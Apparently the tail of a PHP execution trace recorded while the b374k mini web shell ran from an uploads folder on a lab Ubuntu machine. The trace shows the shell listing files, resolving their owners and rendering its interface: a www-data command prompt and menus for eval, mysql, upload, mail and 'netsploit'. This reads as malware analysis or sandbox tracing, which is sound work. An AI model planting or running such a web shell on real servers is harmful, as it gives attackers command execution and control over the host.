5 96 0 0.055328 723176 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'data'
6 97 0 0.055349 723176 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' 'data'
6 97 1 0.055372 723272
6 97 R 'data'
5 96 1 0.055392 723176
5 96 R 'data'
5 98 0 0.055413 723624 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'data'
6 99 0 0.055434 723624 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' 'data'
6 99 1 0.055456 723720
6 99 R 'data'
5 98 1 0.055476 723624
5 98 R 'data'
5 100 0 0.055496 723624 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'data'
6 101 0 0.055517 723624 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' 'data'
6 101 1 0.055539 723720
6 101 R 'data'
5 100 1 0.055559 723624
5 100 R 'data'
5 102 0 0.055581 723808 get_perms 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/data'
6 103 0 0.055603 723808 fileperms 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/data'
6 103 1 0.055628 723872
6 103 R 16895
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $mode = 16895
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms = ''
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'w'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'x'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'w'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'x'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'w'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'x'
5 102 1 0.055828 723872
5 102 R 'rwxrwxrwx'
5 104 0 0.055851 723776 filemtime 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'data'
5 104 1 0.055874 723792
5 104 R 1676243119
5 105 0 0.055896 723752 date 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 2 'd-M-Y H:i' 1676243119
5 105 1 0.055944 724080
5 105 R '12-Feb-2023 18:05'
5 106 0 0.055968 723752 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'data'
6 107 0 0.055989 723752 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' 'data'
6 107 1 0.056011 723848
6 107 R 'data'
5 106 1 0.056033 723752
5 106 R 'data'
5 108 0 0.056053 723880 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'data'
6 109 0 0.056073 723880 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' 'data'
6 109 1 0.056096 723976
6 109 R 'data'
5 108 1 0.056117 723880
5 108 R 'data'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff .= '<tr><td><a id="data_link" href="?y=/var/www/html/uploads/data/">[ data ]</a> <form action="?y=/var/www/html/uploads/" method="post" id="data_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="data" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="data" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" type="submit" name="cancel" value="cancel" onclick="tukar'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $full = '/var/www/html/uploads/.htaccess'
5 110 0 0.056195 724576 fileowner 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '.htaccess'
5 110 1 0.056220 724624
5 110 R 0
5 111 0 0.056240 724584 posix_getpwuid 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 0
5 111 1 0.056275 725384
5 111 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
5 112 0 0.056340 724584 filegroup 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '.htaccess'
5 112 1 0.056362 724624
5 112 R 0
5 113 0 0.056381 724584 posix_getgrgid 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 0
5 113 1 0.056415 725240
5 113 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
5 114 0 0.056492 724584 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '.htaccess'
6 115 0 0.056513 724584 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
6 115 1 0.056536 724680
6 115 R '.htaccess'
5 114 1 0.056558 724584
5 114 R '.htaccess'
5 116 0 0.056580 724808 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '.htaccess'
6 117 0 0.056601 724808 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
6 117 1 0.056623 724904
6 117 R '.htaccess'
5 116 1 0.056645 724808
5 116 R '.htaccess'
5 118 0 0.056666 725224 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '.htaccess'
6 119 0 0.056686 725224 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
6 119 1 0.056708 725320
6 119 R '.htaccess'
5 118 1 0.056729 725224
5 118 R '.htaccess'
5 120 0 0.056750 725224 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '.htaccess'
6 121 0 0.056770 725224 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
6 121 1 0.056797 725320
6 121 R '.htaccess'
5 120 1 0.056818 725224
5 120 R '.htaccess'
5 122 0 0.056839 725352 ukuran 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
6 123 0 0.056861 725352 filesize 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
6 123 1 0.056886 725408
6 123 R 64
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $size = 64
5 122 1 0.056925 725368
5 122 R 64
5 124 0 0.056946 725368 get_perms 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
6 125 0 0.056968 725368 fileperms 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
6 125 1 0.056990 725408
6 125 R 33188
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $mode = 33188
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms = ''
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'w'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= '-'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= '-'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= '-'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= '-'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= '-'
5 124 1 0.057180 725408
5 124 R 'rw-r--r--'
5 126 0 0.057202 725496 filemtime 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/.htaccess'
5 126 1 0.057224 725536
5 126 R 1676243119
5 127 0 0.057245 725496 date 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 2 'd-M-Y H:i' 1676243119
5 127 1 0.057291 725824
5 127 R '12-Feb-2023 18:05'
5 128 0 0.057315 725624 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '.htaccess'
6 129 0 0.057336 725624 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
6 129 1 0.057359 725720
6 129 R '.htaccess'
5 128 1 0.057381 725624
5 128 R '.htaccess'
5 130 0 0.057402 725624 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '.htaccess'
6 131 0 0.057423 725624 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' '.htaccess'
6 131 1 0.057445 725720
6 131 R '.htaccess'
5 130 1 0.057467 725624
5 130 R '.htaccess'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff .= '<tr><td><a id=".htaccess_link" href="?y=/var/www/html/uploads/&view=/var/www/html/uploads/.htaccess">.htaccess</a> <form action="?y=/var/www/html/uploads/" method="post" id=".htaccess_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value=".htaccess" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value=".htaccess" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" '
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $full = '/var/www/html/uploads/403.php'
5 132 0 0.057547 728696 fileowner 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '403.php'
5 132 1 0.057572 728712
5 132 R 1000
5 133 0 0.057592 728672 posix_getpwuid 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 1000
5 133 1 0.057645 729488
5 133 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $name = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
5 134 0 0.057713 728688 filegroup 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '403.php'
5 134 1 0.057736 728728
5 134 R 1000
5 135 0 0.057757 728688 posix_getgrgid 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 1000
5 135 1 0.057806 729344
5 135 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $group = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $owner = 'osboxes<span class="gaya"> : </span>osboxes'
5 136 0 0.057891 728704 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '403.php'
6 137 0 0.057912 728704 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' '403.php'
6 137 1 0.057936 728800
6 137 R '403.php'
5 136 1 0.057958 728704
5 136 R '403.php'
5 138 0 0.057980 728928 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '403.php'
6 139 0 0.058001 728928 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' '403.php'
6 139 1 0.058024 729024
6 139 R '403.php'
5 138 1 0.058046 728928
5 138 R '403.php'
5 140 0 0.058068 729344 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '403.php'
6 141 0 0.058089 729344 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' '403.php'
6 141 1 0.058111 729440
6 141 R '403.php'
5 140 1 0.058133 729344
5 140 R '403.php'
5 142 0 0.058154 729344 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '403.php'
6 143 0 0.058175 729344 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' '403.php'
6 143 1 0.058198 729440
6 143 R '403.php'
5 142 1 0.058219 729344
5 142 R '403.php'
5 144 0 0.058240 729344 ukuran 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/403.php'
6 145 0 0.058261 729344 filesize 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/403.php'
6 145 1 0.058285 729408
6 145 R 212
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $size = 212
5 144 1 0.058323 729368
5 144 R 212
5 146 0 0.058345 729496 get_perms 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/403.php'
6 147 0 0.058366 729496 fileperms 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/403.php'
6 147 1 0.058388 729536
6 147 R 33204
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $mode = 33204
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms = ''
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'w'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= '-'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'w'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= '-'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= '-'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= '-'
5 146 1 0.058580 729536
5 146 R 'rw-rw-r--'
5 148 0 0.058602 729624 filemtime 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/403.php'
5 148 1 0.058625 729664
5 148 R 1676243119
5 149 0 0.058646 729624 date 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 2 'd-M-Y H:i' 1676243119
5 149 1 0.058696 729952
5 149 R '12-Feb-2023 18:05'
5 150 0 0.058719 729752 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '403.php'
6 151 0 0.058786 729752 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' '403.php'
6 151 1 0.058811 729848
6 151 R '403.php'
5 150 1 0.058833 729752
5 150 R '403.php'
5 152 0 0.058855 729752 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '403.php'
6 153 0 0.058876 729752 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' '403.php'
6 153 1 0.058904 729848
6 153 R '403.php'
5 152 1 0.058926 729752
5 152 R '403.php'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff .= '<tr><td><a id="403.php_link" href="?y=/var/www/html/uploads/&view=/var/www/html/uploads/403.php">403.php</a> <form action="?y=/var/www/html/uploads/" method="post" id="403.php_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="403.php" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="403.php" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" type="submit'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $full = '/var/www/html/uploads/prepend.php'
5 154 0 0.059007 728736 fileowner 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'prepend.php'
5 154 1 0.059032 728760
5 154 R 0
5 155 0 0.059053 728720 posix_getpwuid 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 0
5 155 1 0.059090 729520
5 155 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
5 156 0 0.059155 728704 filegroup 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'prepend.php'
5 156 1 0.059177 728744
5 156 R 0
5 157 0 0.059197 728704 posix_getgrgid 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 0
5 157 1 0.059232 729360
5 157 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $owner = 'root<span class="gaya"> : </span>root'
5 158 0 0.059307 728688 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'prepend.php'
6 159 0 0.059329 728688 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
6 159 1 0.059353 728784
6 159 R 'prepend.php'
5 158 1 0.059375 728688
5 158 R 'prepend.php'
5 160 0 0.059398 728912 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'prepend.php'
6 161 0 0.059420 728912 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
6 161 1 0.059443 729008
6 161 R 'prepend.php'
5 160 1 0.059464 728912
5 160 R 'prepend.php'
5 162 0 0.059486 729328 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'prepend.php'
6 163 0 0.059508 729328 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
6 163 1 0.059530 729424
6 163 R 'prepend.php'
5 162 1 0.059552 729328
5 162 R 'prepend.php'
5 164 0 0.059573 729328 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'prepend.php'
6 165 0 0.059594 729328 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
6 165 1 0.059617 729424
6 165 R 'prepend.php'
5 164 1 0.059638 729328
5 164 R 'prepend.php'
5 166 0 0.059659 729456 ukuran 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
6 167 0 0.059681 729456 filesize 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
6 167 1 0.059707 729520
6 167 R 57
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $size = 57
5 166 1 0.059745 729480
5 166 R 57
5 168 0 0.059766 729480 get_perms 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
6 169 0 0.059788 729480 fileperms 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
6 169 1 0.059810 729520
6 169 R 33261
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $mode = 33261
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms = ''
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'w'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'x'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= '-'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'x'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'r'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= '-'
5 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $perms .= 'x'
5 168 1 0.060010 729520
5 168 R 'rwxr-xr-x'
5 170 0 0.060033 729608 filemtime 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 '/var/www/html/uploads/prepend.php'
5 170 1 0.060056 729648
5 170 R 1676243119
5 171 0 0.060077 729608 date 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 2 'd-M-Y H:i' 1676243119
5 171 1 0.060125 729936
5 171 R '12-Feb-2023 18:05'
5 172 0 0.060148 729736 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'prepend.php'
6 173 0 0.060170 729736 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
6 173 1 0.060193 729832
6 173 R 'prepend.php'
5 172 1 0.060216 729736
5 172 R 'prepend.php'
5 174 0 0.060237 729736 clearspace 1 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 1 'prepend.php'
6 175 0 0.060258 729736 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 3 ' ' '_' 'prepend.php'
6 175 1 0.060282 729832
6 175 R 'prepend.php'
5 174 1 0.060303 729736
5 174 R 'prepend.php'
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff .= '<tr><td><a id="prepend.php_link" href="?y=/var/www/html/uploads/&view=/var/www/html/uploads/prepend.php">prepend.php</a> <form action="?y=/var/www/html/uploads/" method="post" id="prepend.php_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="prepend.php" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="prepend.php" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class='
4 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff .= '</table>'
4 47 1 0.060383 725392
4 47 R ' <form action="?y=/var/www/html/uploads/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
3 A /var/www/html/uploads/403.php(1) : eval()'d code(194) : eval()'d code 2 $buff = ' <form action="?y=/var/www/html/uploads/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
3 10 1 0.060652 733184
2 5 1 0.060685 574960
1 3 1 0.060697 556696
0.060737 465600
TRACE END [2023-02-12 21:05:45.057793]
Generated HTML code
<html><head><title>:: b374k m1n1 1.01 ::</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = 'none'; document.getElementById(baru).style.display = 'block'; } </script> <style type="text/css"> body{ background:#000000;; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onload="document.getElementById('cmd').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tbody><tr> <td><table class="b_tbl"><tbody><tr><td><a href="?"><span class="b1">b<span class="b2">374</span>k</span></a></td></tr><tr><td>m1n1 1.01</td></tr></tbody></table></td> <td>Apache/2.4.52 (Ubuntu)<br>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br>uid=33(www-data) gid=33(www-data) groups=33(www-data)<br>server ip : 127.0.0.1 <span class="gaya">|</span> your ip : ::1<br>safemode <span class="gaya">OFF<span><br> > <a href="?y=/"> / </a><a href="?y=/var/">var / </a><a href="?y=/var/www/">www / </a><a href="?y=/var/www/html/">html / </a></span></span></td> </tr></tbody></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?y=/var/www/html/">explore</a> <a href="?y=/var/www/html/&x=shell">shell</a> <a href="?y=/var/www/html/&x=php">eval</a> <a href="?y=/var/www/html/&x=mysql">mysql</a> <a href="?y=/var/www/html/&x=phpinfo">phpinfo</a> <a href="?y=/var/www/html/&x=netsploit">netsploit</a> <a href="?y=/var/www/html/&x=upload">upload</a> <a href="?y=/var/www/html/&x=mail">mail</a> </div> <!-- menu end --> <form action="?y=/var/www/html/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tbody><tr><td>www-data $ </td><td><input onmouseover="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value=""><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;"></td></tr> <form action="?" 